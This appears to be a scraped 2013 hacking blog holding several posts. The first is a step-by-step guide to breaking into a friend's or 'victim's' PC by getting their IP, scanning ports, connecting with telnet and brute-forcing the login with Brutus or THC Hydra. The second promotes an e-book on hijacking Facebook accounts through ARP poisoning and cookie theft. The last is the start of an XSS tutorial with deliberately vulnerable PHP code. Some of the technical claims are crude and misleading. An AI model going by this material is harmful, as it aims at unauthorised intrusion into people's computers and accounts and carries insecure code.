<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<code style="border: 0px; font-family: 'andale mono', 'lucida console', monospace; font-size: 1em; line-height: 1.5; margin: 0px; padding: 0px; vertical-align: baseline;">ping www.google.com</code><div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
will fetch the IP address of Google.com<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
</div>
<div class="separator" style="border: 0px; clear: both; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXtbDIm-z9mOpZasVCA8hs8sHIrvptzMqcro13bYGmxHgJ6PWVo7sGOTH7J9WU3GLxnWNiXNxzmoF5K10All281c7uxFw34GifbonzL6PU28ruNo0u1rE5PUjjMUmtxo3NCNbULQ4AvJx5/s1600/a.jpg" rel="nofollow" style="border: 0px; color: #e1380f; font-family: inherit; font-style: inherit; margin: 0px 1em; padding: 0px; vertical-align: baseline;"><img alt="a How to hack remote computer using IP Address" border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXtbDIm-z9mOpZasVCA8hs8sHIrvptzMqcro13bYGmxHgJ6PWVo7sGOTH7J9WU3GLxnWNiXNxzmoF5K10All281c7uxFw34GifbonzL6PU28ruNo0u1rE5PUjjMUmtxo3NCNbULQ4AvJx5/s400/a.jpg" style="border: none; font-family: inherit; font-style: inherit; margin: 0px; max-width: 680px; padding: 0px; vertical-align: baseline;" title="How to hack remote computer using IP Address" width="400" /></a></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
This is how we can get the IP address of the victims website.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
One of the widely used method to detect IP address of your friend is by chatting with him.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
You might find this article helpful</div>
<ul style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">How to get the IP address using MSN/Yahoo/Pidgin messenger</li>
</ul>
</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
Now you got the IP address right? Is it online?<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
To know the online status just ping the IP address, if it is online it will reply.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
Use Advanced Port Scanner to scan all open and venerable ports.</div>
<div class="separator" style="border: 0px; clear: both; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhERWmqRMpb-3tjyyQaPbUboycp8GidYvrbR1jCzyy7Rk0Sc60UVr4Cypu-OxJLuOJlPhdWQALtt7suOuJq3Z6tDmC9tkyBXKrDE26OY677KS4gRRoBpYEB2JPlHA8aWgxCvJ2lO79aN0X-/s1600/b.jpg" rel="nofollow" style="border: 0px; color: #e1380f; font-family: inherit; font-style: inherit; margin: 0px 1em; padding: 0px; vertical-align: baseline;"><img alt="b How to hack remote computer using IP Address" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhERWmqRMpb-3tjyyQaPbUboycp8GidYvrbR1jCzyy7Rk0Sc60UVr4Cypu-OxJLuOJlPhdWQALtt7suOuJq3Z6tDmC9tkyBXKrDE26OY677KS4gRRoBpYEB2JPlHA8aWgxCvJ2lO79aN0X-/s320/b.jpg" style="border: none; font-family: inherit; font-style: inherit; margin: 0px; max-width: 680px; padding: 0px; vertical-align: baseline;" title="How to hack remote computer using IP Address" /></a></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
<code style="border: 0px; font-family: 'andale mono', 'lucida console', monospace; font-size: 1em; line-height: 1.5; margin: 0px; padding: 0px; vertical-align: baseline;">telnet [IP address] [Port]</code></div>
<div class="separator" style="border: 0px; clear: both; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wWgLR0l928jRJASF1sA8Hjf1k2VOVRXOqqid-ERnpnxgTzNdT0gYlVnMI9n4e8Ph2miBSZyBJX0sJMTnyiJQY9SpguBvJP89xYgLl9-ygmwkjH1Dgl4b65PBp_l7GSrW0zbv1Rp5nMPj/s1600/c.jpg" rel="nofollow" style="border: 0px; color: #e1380f; font-family: inherit; font-style: inherit; margin: 0px 1em; padding: 0px; vertical-align: baseline;"><img alt="c How to hack remote computer using IP Address" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wWgLR0l928jRJASF1sA8Hjf1k2VOVRXOqqid-ERnpnxgTzNdT0gYlVnMI9n4e8Ph2miBSZyBJX0sJMTnyiJQY9SpguBvJP89xYgLl9-ygmwkjH1Dgl4b65PBp_l7GSrW0zbv1Rp5nMPj/s320/c.jpg" style="border: none; font-family: inherit; font-style: inherit; margin: 0px; max-width: 680px; padding: 0px; vertical-align: baseline;" title="How to hack remote computer using IP Address" /></a></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
You’ll be asked to input login information.</div>
<div class="separator" style="border: 0px; clear: both; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvXNDn9jI-qWm99G5E1d-cB4m7JXboEzC3qtmyAR7t_lUSxTkxMVchy2GjPWWnQzf0xifyYJOD8DqFHebdnB2vqyTO90zL67OkytN2K9Nj_5ct77ZjfOqXNwlScFOGVjJysFUlPqquK5KN/s1600/d.jpg" rel="nofollow" style="border: 0px; color: #e1380f; font-family: inherit; font-style: inherit; margin: 0px 1em; padding: 0px; vertical-align: baseline;"><img alt="d How to hack remote computer using IP Address" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvXNDn9jI-qWm99G5E1d-cB4m7JXboEzC3qtmyAR7t_lUSxTkxMVchy2GjPWWnQzf0xifyYJOD8DqFHebdnB2vqyTO90zL67OkytN2K9Nj_5ct77ZjfOqXNwlScFOGVjJysFUlPqquK5KN/s320/d.jpg" style="border: none; font-family: inherit; font-style: inherit; margin: 0px; max-width: 680px; padding: 0px; vertical-align: baseline;" title="How to hack remote computer using IP Address" /></a></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one: Brutus, THC </div>
- Hydra<br />
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
In this way you’ll able to hack remove computer using only IP address</div>
</div>
</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com492tag:blogger.com,1999:blog-5727431290630009200.post-32750699045389671192013-06-18T10:18:00.001-07:002013-06-18T10:25:22.701-07:00Learn How to Hack Facebook Accounts via ARP Poisoning<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGcnyYQNd_yORtC8iLowMmAiKsEMWu7WNVa15OyRvbhvJaAQeoQ6nkpppqx_QGsJW2G83Aj1tLGqOa4U37mFmVCix90EKtwmA9DzDzXFU-3xLR8t95AEsAGOASBigrBnPWhNrmuzjJ_7Y/s1600/learn+how+to+hack,+how+to+hack+facebook,+hack+facebook+account,+hack+fb+ACC,+Hack+Facebook+Accounts+via+ARP+Poisoning.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGcnyYQNd_yORtC8iLowMmAiKsEMWu7WNVa15OyRvbhvJaAQeoQ6nkpppqx_QGsJW2G83Aj1tLGqOa4U37mFmVCix90EKtwmA9DzDzXFU-3xLR8t95AEsAGOASBigrBnPWhNrmuzjJ_7Y/s400/learn+how+to+hack,+how+to+hack+facebook,+hack+facebook+account,+hack+fb+ACC,+Hack+Facebook+Accounts+via+ARP+Poisoning.jpg" width="400" /></a></div>
<span style="background-color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;">Compromising Facebook Account Via ARP Poisoning is e-Book written By Deep, this book will explain “ARP Poisoning Attack” or “Man in the Middle Attack”… In this book we use a packet sniffer called “Wireshark” to capture the packets ie coockie. Here we will see how Wireshark sniffs the packets and finally captured facebook’s authentication coockie and replaced the victims authentication coockie with our own authentication coockie allow us to compromise a facebook account easily. In this book/white paper we will see how we can hack a facebook account over a LAN with ARP Poisoning or MitMA -</span><br />
<span style="background-color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;"><br /></span>
<span style="background-color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;">DOWNLOAD: </span><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif;"><a href="http://adf.ly/QjB5e">http://adf.ly/QjB5e</a></span>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com102tag:blogger.com,1999:blog-5727431290630009200.post-33312486256441815192013-06-17T04:53:00.002-07:002013-06-17T05:10:32.235-07:00BackTrack/Kali Wallpapers<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<b><span style="font-size: medium;">CLICK ON PICTURE FOR FULL SIZE</span></b></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<b><span style="font-size: medium;"><br /></span></b></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qexm9" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRXu7KDS6ZSg0oexiVNb7FZJc4ci4cDKiKnCYVENg6tZqsOOc31r7fhRHpxn_YaLTC9B6yHKI7lnnlFIfhRZ-FmORLD3PnSric3av7whUC3JD4Wm23EblLQ6tnGxAsc8zrw13iVAycr88/s640/603786_365812740194634_9922712619_n.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QeyHT" target="_blank"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkCQ4YiI7ndQ_1hQUmIcRJOTj7twxVySE4XCHcKzN0rX2tVjEdhE0aBxRk00UvoYDJTvCvi9E6uu5aGwZNsF4DbabNcEdevmP6VOQ__Z2aeriPvBI-lK8L8mHcX29ERMN-3GXFoCp2-1c/s640/322745_250927751651027_2029533101_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QeyU4" target="_blank"><img border="0" height="481" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk4itN4k16jHRh1_u19Ar2xHD8cMT0mrMNlzRN8K92r5H4XdPIah5asWLXI5PhoxF3nIkJZkA-Qz1wVG387qPgEXSQncN9EFWRi3RYBXPc96EDKoTrNRs2T7u2SwexvHbu12EVrk4dqpc/s640/462419_273401079403694_1546569724_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QeydV" target="_blank"><img border="0" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1FYlTT02PBr2oxqxM6H3S1E2NNHbGC77F8Ud2XK5Wg69QZahRDG5e_M8oRaVjFf0Zwl2bmv84MgS6Fuz7r2f-hMRgNDroQFLe2HiJ_26J6JafUEA2XGaVR189x8qV7-Zi3tw_-pCk2aU/s640/322563_251412598269209_1844289379_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qeykz" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxmkYR2zRuE3mEALw0LPchiCjxHIzC7Lr5VzjmbKFXimV1yBTNW48w8J2BE1lnj3EGsOfO5LBD43hhg8HUpj7b_hkDBxf6zNhEu5zHYISm3h-uvbJz9nWrrdHQTvpALrQzePGe1c-axT4/s640/407021_251412868269182_863980518_n.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qeysw" target="_blank"><img border="0" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5_l-4weuqWm1sFoLI98ROdM7_dXieYIWyZ4GAr_b3Qpq4UyvpdE-AWF0PQmjEKHXmHg1DR1yv54sNrLQG3hMb-Fiy869ltb0PkSw_iJVSLTCmhnyybMZ69tODac0_Qc6nhpWWvjMdcdo/s640/415806_266135406796928_1599704024_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qez0o" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo6LNfs0qs1prOsWmctr3c2gIHBf6iI98XlVU_HBc7QMNJlZTwkNvEjfY2NDjS3jsDHF6SGvbz6m8bKHxBaxigIAr0ylcjAVDinLHfAAVduqq_HlIOaPhfY-rxUaolgxfmO-A4-7YZjfk/s640/464092_273401252737010_2043418795_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qez6Z" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSjvJqsT50JwOkcShiC8GKhhyQEG2e42RJKJqHZUvFr73D6LNb3xBPAQKLB359N9yfk62YZSgjAto2CzxHHeDQuPWxObsanc2E8Qw8Rm8SCpPgmXz6sE0eYd4fAvNWVT2nlls-QHLiN-k/s640/341021_251412451602557_1139521373_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QezDY" target="_blank"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQIMN3MMXntNDS-c4sSAgzHZ5IDSbMnrZfLxXMKPsAC9pK9Y_YJfI6-yhGMmFzWc9gIo_vvrDROPObJO0g3BIJ5dWaNX1c6qGXjiXjW6UKg8fImNmROJk4x5QocedEPq-VeyrTnVH7wa0/s640/432025_251412481602554_1210507601_n.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QezKS" target="_blank"><img border="0" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdtWxONIDvxlhA6etrwaq5XyWFmqXmTRYR9_GemTsaPEwPu6dyPjDE-xhnC7l618CeCAHmNL0w_CMiej090kfdDSSwURM44UeO3xWhKaxiBH6BoGKMcW0BZEL73Fztyo1LvXTsmaJ0y9Q/s640/255442_365363376874130_546101708_n.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QezVH" target="_blank"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEFe5e6s0w_53C-rndua8zJwABWV26gAIFbp_BplIZeCCUB8UhK7lvXdFplAaCIjzgzi4bQM4Krrez9Z6llvsiLkystGzpwmbCR_A1IT6PRqFPpr4wwvM9esFtyXkAHaoaJOGSHDUyTZs/s640/321995_410822615661539_1457439326_o.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QezgE" target="_blank"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPqex6rPz2cqVEOERLn4SOHkHs4GDSZnta7dJjny5einBWF3WUD7MxYMeMsq4fT9Zw6EYvAvNOSlc0We1LOg78I4b0Ytau1X5y4NQaHtv015HrvfrHI9pavSIFo72S9ibB7v2NThKVjBY/s640/412089_282485041828631_871646398_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qezp8" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUMb-_LZNXB62pm454e7PDPRzGgzJnk7VcbGHlykAYc10d9_5pk_6RbFjBq1jY1hyphenhyphenVpc_ejec6bt2e_Ro-gb7vZ40K2bNJM7TDcIeYki211LT-3nrgFG6cSm9_696KBEv-yuqSpmSDfBk/s640/412399_273401956070273_1681201527_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QeztD" target="_blank"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW-SHV92AxoV2s14VGBulZRHUJCk7xAMYZ9CraD14H-JnYQY0I8EmdQAt8iKXAKVHoFmcJSF9zDMuQaYF5PE2iB3RSoRXSf4OMEnM6idExF0Hynl-teBEqrLPNjGlm3lSjXuylA7Vyp6I/s640/858795_430300893713711_353734242_o.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QezzR" target="_blank"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipGzH86fLADmXQ3hw7yEgWzdLq35nd7nhQhs6unSpARGDmz9VHcgYWEX1OrogRlo0cQFSWJIInuTOirXyUpaCt5LnYHVzX4wBWAwNg6Ukn_j9HoX3x8ttZuMUCtwUuc2ZCQAa7Rn4PQJ0/s640/775661_422597424484058_1138365052_o.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qf07W" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh889Aazt9A3dPdrgGi0whcgaiATLAin1Xxh9NSPg8EObzD53emmq_1zaS1rTLem_oYzWK5nlyUdAUIIRDSIHJsb0Z9A8C4bf-mwhWdjr73BOQrYtZTOVn5CNTeLQW5TEu5gyVKlL-YaM/s640/557082_344284552315346_256746288_n.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qf0GD" target="_blank"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz9JB2GsQkhEN0_Toa1cPCstzb-Qu1WgIAA6_JIQJigEARjFr_Hw5N-5_TgE6Vu8ilA9OqAv-46XKKVGcpFReoWIP7eiR667trXvVZzehuNA7Y3jf-7PJey9qdWuftXdKyktthIyp1bWw/s640/kali_linux_wallpaper_by_humanlly-d611zcx.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" />
<div class="separator" style="background-color: #1b1b1c; clear: both; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/Qf0Lz" target="_blank"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijApX2zDO8IPUX9jawz_olhAxVyznMbw7tbZ4uzqNysjr4FbNKffQLome_DWhljH0mhTtxuWkBAlkQKuByVef7-abKCE0sZlyt-qhdkBbLjtnPeoUvCOapd9KG5iL-sE72W09ngOlfVhA/s640/0_600_800_http-__i.haymarket.net.au_News_kali+linux.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com7tag:blogger.com,1999:blog-5727431290630009200.post-67706151952598009192013-06-11T08:05:00.000-07:002013-06-11T08:05:31.876-07:00XSS Attack Examples<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
In this article we will see a different kind of attack called XXS attacks.</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
XSS stands for Cross Site Scripting.</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.<br style="margin: 0px; padding: 0px;" /><span id="more-9629" style="margin: 0px; padding: 0px;"></span></div>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
Types of Cross Site Scripting</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
XSS attacks are broadly classified into 2 types:</div>
<ol style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin: 0px 0px 1.571em 1.571em; padding: 0px;">
<li style="margin: 0px; padding: 0px;">Non-Persistent</li>
<li style="margin: 0px; padding: 0px;">Persistent</li>
</ol>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
1. Non-Persistent XSS Attack</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.</div>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
Example for Non-Persistent XSS</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
index.php:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;"><?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://xssattackexamples.com/">Click to Download</a>";
?></pre>
